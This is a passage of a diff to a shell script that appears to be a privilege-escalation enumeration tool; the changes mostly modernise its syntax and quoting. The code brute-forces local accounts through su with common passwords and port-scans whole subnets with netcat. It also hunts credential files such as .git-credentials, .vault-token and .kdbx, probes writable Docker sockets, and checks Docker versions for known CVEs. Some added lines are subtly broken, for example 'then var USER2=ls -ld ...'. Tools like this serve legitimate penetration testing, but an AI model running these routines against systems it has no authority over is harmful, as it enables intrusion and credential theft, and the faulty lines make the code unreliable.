"%s" "$WF" | grep "tmp\|shm\|home\|Users\|root\|etc\|var\|opt\|bin\|lib\|mnt\|private\|Applications" | head -n1`" + Wfolders=$(printf "%s" "$WF" | tr '\n' '|')"|[^\*][^\ ]*\ \*" + Wfolder="$(printf "%s" "$WF" | grep "tmp\|shm\|home\|Users\|root\|etc\|var\|opt\|bin\|lib\|mnt\|private\|Applications" | head -n1)" printf "test\ntest\ntest\ntest"| sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" >/dev/null 2>&1 if [ $? -eq 0 ]; then SEDOVERFLOW=false @@ -450,17 +484,18 @@ while $SEDOVERFLOW; do fi done + notExtensions="\.tif$|\.tiff$|\.gif$|\.jpeg$|\.jpg|\.jif$|\.jfif$|\.jp2$|\.jpx$|\.j2k$|\.j2c$|\.fpx$|\.pcd$|\.png$|\.pdf$|\.flv$|\.mp4$|\.mp3$|\.gifv$|\.avi$|\.mov$|\.mpeg$|\.wav$|\.doc$|\.docx$|\.xls$|\.xlsx$|\.svg$" -TIMEOUT="`command -v timeout 2>/dev/null`" -STRACE="`command -v strace 2>/dev/null`" -STRINGS="`command -v strings 2>/dev/null`" +TIMEOUT="$(command -v timeout 2>/dev/null)" +STRACE="$(command -v strace 2>/dev/null)" +STRINGS="$(command -v strings 2>/dev/null)" shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh" notBackup="/tdbbackup$|/db_hotbackup$" -cronjobsG=".placeholder|0anacron|0hourly|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-notifier-common|upstart" +cronjobsG=".placeholder|0anacron|0hourly|110.clean-tmps|130.clean-msgs|140.clean-rwho|199.clean-fax|199.rotate-fax|200.accounting|310.accounting|400.status-disks|420.status-network|430.status-rwho|999.local|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-notifier-common|upstart|" cronjobsB="centreon" processesVB="jdwp|tmux |screen |--inspect|--remote-debugging-port" @@ -488,7 +523,7 @@ GREP_DOCKER_SOCK_INFOS="Architecture|OSType|Name|DockerRootDir|NCPU|OperatingSys GREP_DOCKER_SOCK_INFOS_IGNORE="IndexConfig" GREP_IGNORE_MOUNTS="/ /|/cgroup|/var/lib/docker/|/null | proc proc |/dev/console|docker.sock" -INT_HIDDEN_FILES=".rhosts|.irssi|.keyring|.cer|.jks|.service|.vnc|.p12|.ftpconfig|.crt|.lesshst|.git-credentials|._history|.sudo_as_admin_successful|.timer|.gnupg|.gpg|.sqlite3|.recently-used.xbel|.erlang.cookie|.socket|.pem|.cloudflared|.bashrc|.git|.pypirc|.csr|.plan|.rdg|.ovpn|.pfx|.gitconfig|.svn|.der|.sqlite|.google_authenticator|.viminfo|.bluemix|.htpasswd|.kdbx|.mozilla|.env|.vault-token|.ldaprc|.swp|.msmtprc|.profile|.github|.pgp|.keystore|.db|.k5login|.key" +INT_HIDDEN_FILES="._history.|.bashrc|.bluemix|.cer|.cloudflared|.crt|.csr|.db|.der|.env|.erlang.cookie|.ftpconfig|.git|.git-credentials|.gitconfig|.github|.gnupg|.google_authenticator|.gpg|.htpasswd|.irssi|.jks|.k5login|.kdbx|.key|.keyring|.keystore|.ldaprc|.lesshst|.mozilla|.msmtprc|.ovpn|.p12|.pem|.pfx|.pgp|.plan|.profile|.pypirc|.rdg|.recently-used.xbel|.rhosts|.service|.socket|.sqlite|.sqlite3|.sudo_as_admin_successful|.svn|.swp|.timer|.vault-token|.viminfo|.vnc|.wgetrc" ########################################### #---------) Checks before start (---------# @@ -496,7 +531,7 @@ INT_HIDDEN_FILES=".rhosts|.irssi|.keyring|.cer|.jks|.service|.vnc|.p12|.ftpconfi # --) ps working good # --) Network binaries -if [ `ps auxwww 2>/dev/null | wc -l 2>/dev/null` -lt 8 ]; then +if [ "$(ps auxwww 2>/dev/null | wc -l 2>/dev/null)" -lt 8 ]; then NOUSEPS="1" fi @@ -535,13 +570,11 @@ fi ########################################### echo_not_found (){ - if [ "$VERBOSE" ]; then - printf $DG"$1 Not Found\n"$NC - fi + printf $DG"$1 Not Found\n"$NC } warn_exec(){ - $* || echo_not_found $1 + $* 2>/dev/null || echo_not_found $1 } echo_no (){ @@ -550,46 +583,46 @@ echo_no (){ print_title(){ if [ "$VERBOSE" ]; then - END_T2_TIME=`date +%s 2>/dev/null` + END_T2_TIME=$(date +%s 2>/dev/null) if [ "$START_T2_TIME" ]; then TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME)) printf $DG"This check took $TOTAL_T2_TIME seconds\n"$NC fi - END_T1_TIME=`date +%s 2>/dev/null` + END_T1_TIME=$(date +%s 2>/dev/null) if [ "$START_T1_TIME" ]; then TOTAL_T1_TIME=$(($END_T1_TIME - $START_T1_TIME)) printf $DG"The total section execution took $TOTAL_T1_TIME seconds\n"$NC echo "" fi - START_T1_TIME=`date +%s 2>/dev/null` + START_T1_TIME=$(date +%s 2>/dev/null) fi - printf ${BLUE}"════════════════════════════════════╣ "$GREEN"$1"${BLUE}" ╠════════════════════════════════════\n"$NC + printf ${BLUE}"════════════════════════════════════╣ $GREEN$1${BLUE} ╠════════════════════════════════════\n"$NC } print_2title(){ if [ "$VERBOSE" ]; then - END_T2_TIME=`date +%s 2>/dev/null` + END_T2_TIME=$(date +%s 2>/dev/null) if [ "$START_T2_TIME" ]; then TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME)) printf $DG"This check took $TOTAL_T2_TIME seconds\n"$NC echo "" fi - START_T2_TIME=`date +%s 2>/dev/null` + START_T2_TIME=$(date +%s 2>/dev/null) fi - printf ${BLUE}"╔══════════╣ "$GREEN"$1\n"$NC #There are 10 "═" + printf ${BLUE}"╔══════════╣ $GREEN$1\n"$NC #There are 10 "═" } print_3title(){ - printf ${BLUE}"══╣ "$GREEN"$1\n"$NC #There are 2 "═" + printf ${BLUE}"══╣ $GREEN$1\n"$NC #There are 2 "═" } print_list(){ - printf ${BLUE}"═╣ "$GREEN"$1"$NC #There is 1 "═" + printf ${BLUE}"═╣ $GREEN$1"$NC #There is 1 "═" } print_info(){ @@ -598,9 +631,9 @@ print_info(){ print_ps (){ (ls -d /proc/*/ 2>/dev/null | while read f; do - CMDLINE=`cat $f/cmdline 2>/dev/null | grep -av "seds,"`; #Delete my own sed processess + CMDLINE=$(cat $f/cmdline 2>/dev/null | grep -av "seds,"); #Delete my own sed processess if [ "$CMDLINE" ]; - then USER2=ls -ld $f | awk '{print $3}'; PID=`echo $f | cut -d "/" -f3`; + then var USER2=ls -ld $f | awk '{print $3}'; PID=$(echo $f | cut -d "/" -f3); printf " %-13s %-8s %s\n" "$USER2" "$PID" "$CMDLINE"; fi; done) 2>/dev/null | sort -r @@ -609,7 +642,7 @@ print_ps (){ su_try_pwd (){ BFUSER=$1 PASSWORDTRY=$2 - trysu=`echo "$PASSWORDTRY" | timeout 1 su $BFUSER -c whoami 2>/dev/null` + trysu=$(echo "$PASSWORDTRY" | timeout 1 su $BFUSER -c whoami 2>/dev/null) if [ "$trysu" ]; then echo " You can login as $BFUSER using password: $PASSWORDTRY" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi @@ -618,32 +651,38 @@ su_try_pwd (){ su_brute_user_num (){ BFUSER=$1 TRIES=$2 - su_try_pwd $BFUSER "" & #Try without password - su_try_pwd $BFUSER $BFUSER & #Try username as password - su_try_pwd $BFUSER `echo $BFUSER | rev 2>/dev/null` & #Try reverse username as password + su_try_pwd "$BFUSER" "" & #Try without password + su_try_pwd "$BFUSER" "$BFUSER" & #Try username as password + su_try_pwd "$BFUSER" "$(echo $BFUSER | rev 2>/dev/null)" & #Try reverse username as password if [ "$PASSWORD" ]; then - su_try_pwd $BFUSER $PASSWORD & #Try given password + su_try_pwd "$BFUSER" "$PASSWORD" & #Try given password fi - for i in `seq $TRIES`; do - su_try_pwd $BFUSER `echo $top2000pwds | cut -d " " -f $i` & #Try TOP TRIES of passwords (by default 2000) + for i in $(seq "$TRIES"); do + su_try_pwd "$BFUSER" "$(echo $top2000pwds | cut -d ' ' -f $i)" & #Try TOP TRIES of passwords (by default 2000) sleep 0.007 # To not overload the system done wait } check_if_su_brute(){ - error=$(echo "" | timeout 1 su `whoami` -c whoami 2>&1); - if [ ! "`echo $error | grep "must be run from a terminal"`" ]; then + error=$(echo "" | timeout 1 su $(whoami) -c whoami 2>&1); + if ! echo $error | grep -q "must be run from a terminal"; then echo "1" fi } eval_bckgrd(){ - CMD_PARAM="$1" eval "$1" & CONT_THREADS=$(($CONT_THREADS+1)); if [ "$(($CONT_THREADS%$THREADS))" -eq "0" ]; then wait; fi } +macosNotSigned(){ + for filename in $1/*; do + if codesign -vv -d \"$filename\" 2>&1 | grep -q 'not signed'; then + echo "$filename isn't signed" | sed -${E} "s,.*,${SED_RED}," + fi + done +} ########################################### #---------) Internet functions (----------# @@ -707,7 +746,7 @@ tcp_recon (){ for port in $PORTS; do for j in $(seq 1 254) do - ($NC_SCAN $IP3.$j $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") & + ($NC_SCAN "$IP3"."$j" "$port" 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") & done wait done @@ -720,19 +759,19 @@ tcp_port_scan (){ print_title "Network Port Scanning" IP=$1 PORTS="$2" - PORTS="`echo \"$PORTS\" | tr ',' ' '`" if [ -z "$PORTS" ]; then printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: DEFAULT (nmap top 1000)" $NC | tr '\n' " " printf "$NC\n" PORTS="1 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389" else + PORTS="$(echo $PORTS | tr ',' ' ')" printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " " printf "$NC\n" fi for port in $PORTS; do - ($NC_SCAN $IP $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") & + ($NC_SCAN "$IP" "$port" 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") & done wait } @@ -744,10 +783,10 @@ discover_network (){ print_title "Network Discovery" DISCOVERY=$1 - IP=$(echo $DISCOVERY | cut -d "/" -f 1) - NETMASK=$(echo $DISCOVERY | cut -d "/" -f 2) + IP=$(echo "$DISCOVERY" | cut -d "/" -f 1) + NETMASK=$(echo "$DISCOVERY" | cut -d "/" -f 2) - if [ -z $IP ] || [ -z $NETMASK ]; then + if [ -z "$IP" ] || [ -z "$NETMASK" ]; then printf $RED"[-] Err: Bad format. Example: 127.0.0.1/24"$NC; printf ${BLUE}"$HELP"$NC; exit 0 @@ -755,20 +794,20 @@ discover_network (){ #Using fping if possible if [ "$FPING" ]; then - $FPING -a -q -g $DISCOVERY | sed -${E} "s,.*,${SED_RED}," + $FPING -a -q -g "$DISCOVERY" | sed -${E} "s,.*,${SED_RED}," #Loop using ping else - if [ $NETMASK -eq "24" ]; then + if [ "$NETMASK" -eq "24" ]; then printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n$NC" icmp_recon $IP - elif [ $NETMASK -eq "16" ]; then + elif [ "$NETMASK" -eq "16" ]; then printf ${YELLOW}"[+]$GREEN Netmask /16 detected, starting...\n$NC" for i in $(seq 1 254) do - NEWIP=$(echo $IP | cut -d "." -f 1,2).$i.1 - icmp_recon $NEWIP + NEWIP=$(echo "$IP" | cut -d "." -f 1,2).$i.1 + icmp_recon "$NEWIP" done else printf $RED"[-] Err: Sorry, only Netmask /24 and /16 supported in ping mode. Netmask detected: $NETMASK"$NC; @@ -785,8 +824,8 @@ discovery_port_scan (){ DISCOVERY=$1 MYPORTS=$2 - IP=$(echo $DISCOVERY | cut -d "/" -f 1) - NETMASK=$(echo $DISCOVERY | cut -d "/" -f 2) + IP=$(echo "$DISCOVERY" | cut -d "/" -f 1) + NETMASK=$(echo "$DISCOVERY" | cut -d "/" -f 2) echo "Scanning: $DISCOVERY" if [ -z "$IP" ] || [ -z "$NETMASK" ] || [ "$IP" = "$NETMASK" ]; then @@ -798,19 +837,19 @@ discovery_port_scan (){ exit 0 fi - PORTS="22 80 443 445 3389 `echo \"$MYPORTS\" | tr \",\" \" \"`" - PORTS=`echo "$PORTS" | tr " " "\n" | sort -u` #Delete repetitions + PORTS="22 80 443 445 3389 $(echo $MYPORTS | tr ',' ' ')" + PORTS=$(echo "$PORTS" | tr " " "\n" | sort -u) #Delete repetitions if [ "$NETMASK" -eq "24" ]; then printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n" $NC - tcp_recon $IP "$PORTS" + tcp_recon "$IP" "$PORTS" elif [ "$NETMASK" -eq "16" ]; then printf ${YELLOW}"[+]$GREEN Netmask /16 detected, starting...\n" $NC for i in $(seq 0 255) do - NEWIP=$(echo $IP | cut -d "." -f 1,2).$i.1 - tcp_recon $NEWIP "$PORTS" + NEWIP=$(echo "$IP" | cut -d "." -f 1,2).$i.1 + tcp_recon "$NEWIP" "$PORTS" done else printf $RED"[-] Err: Sorry, only netmask /24 and /16 are supported in port discovery mode. Netmask detected: $NETMASK\n"$NC; @@ -837,16 +876,16 @@ fi containerCheck() { inContainer="" - containerType="`echo_no`" + containerType="$(echo_no)" # Are we inside docker? if [ -f "/.dockerenv" ] || grep "/docker/" /proc/1/cgroup -qa 2>/dev/null || grep -qai docker /proc/self/cgroup 2>/dev/null || - [ "`find / -maxdepth 3 -name \"*dockerenv*\" -exec ls -la {} \; 2>/dev/null`" ] ; then + [ "$(find / -maxdepth 3 -name '*dockerenv*' -exec ls -la {} \; 2>/dev/null)" ] ; then inContainer="1" - containerType="docker" + containerType="docker\n" fi # Are we inside kubenetes? @@ -854,8 +893,8 @@ containerCheck() { grep -qai kubepods /proc/self/cgroup 2>/dev/null; then inContainer="1" - if [ "$containerType" ]; then containerType="$containerType (kubernetes)" - else containerType="kubernetes" + if [ "$containerType" ]; then containerType="$containerType (kubernetes)\n" + else containerType="kubernetes\n" fi fi @@ -864,7 +903,7 @@ containerCheck() { grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then inContainer="1" - containerType="lxc" + containerType="lxc\n" fi # Are we inside podman? @@ -872,14 +911,14 @@ containerCheck() { grep -qa "container=podman" /proc/1/environ 2>/dev/null; then inContainer="1" - containerType="podman" + containerType="podman\n" fi # Check for other container platforms that report themselves in PID 1 env if [ -z "$inContainer" ]; then if grep -a 'container=' /proc/1/environ 2>/dev/null; then inContainer="1" - containerType="`grep -a 'container=' /proc/1/environ | cut -d= -f2`" + containerType="$(grep -a 'container=' /proc/1/environ | cut -d= -f2)\n" fi fi } @@ -899,26 +938,26 @@ checkDockerRootless() { } enumerateDockerSockets() { - dockerVersion="`echo_not_found`" + dockerVersion="$(echo_not_found)" if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then SEARCHED_DOCKER_SOCKETS="1" - for dock_sock in `find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" 2>/dev/null`; do + for dock_sock in $(find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" 2>/dev/null); do if ! [ "$IAMROOT" ] && [ -w "$dock_sock" ]; then echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_RED_YELLOW},g" echo "Docker enummeration:" docker_enumerated="" if [ "$(command -v curl)" ]; then - sockInfoResponse="`curl -s --unix-socket \"$dockerSockPath\" http://localhost/info`" + sockInfoResponse="$(curl -s --unix-socket $dock_sock http://localhost/info)" dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4) echo $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' if [ "$sockInfoResponse" ]; then docker_enumerated="1"; fi fi - if [ "$(command -v docker)" ] and ![ "$docker_enumerated" ]; then - sockInfoResponse="`docker info`" + if [ "$(command -v docker)" ] && ! [ "$docker_enumerated" ]; then + sockInfoResponse="$(docker info)" dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' | cut -d' ' -f 4) - printf $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' + printf "$sockInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' fi else @@ -929,28 +968,28 @@ enumerateDockerSockets() { } checkDockerVersionExploits() { - if [ "`echo \"$dockerVersion\" | grep -i \"not found\"`" ]; then - VULN_CVE_2019_13139="`echo_not_found`" - VULN_CVE_2019_5736="`echo_not_found`" + if echo "$dockerVersion" | grep -iq "not found"; then + VULN_CVE_2019_13139="$(echo_not_found)" + VULN_CVE_2019_5736="$(echo_not_found)" return fi - VULN_CVE_2019_13139="`echo_no`" - if [ "`echo \"$dockerVersion\" | sed 's,\.,,g'`" -lt "1895" ]; then + VULN_CVE_2019_13139="$(echo_no)" + if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1895" ]; then VULN_CVE_2019_13139="Yes" fi - VULN_CVE_2019_5736="`echo_no`" - if [ "`echo \"$dockerVersion\" | sed 's,\.,,g'`" -lt "1893" ]; then + 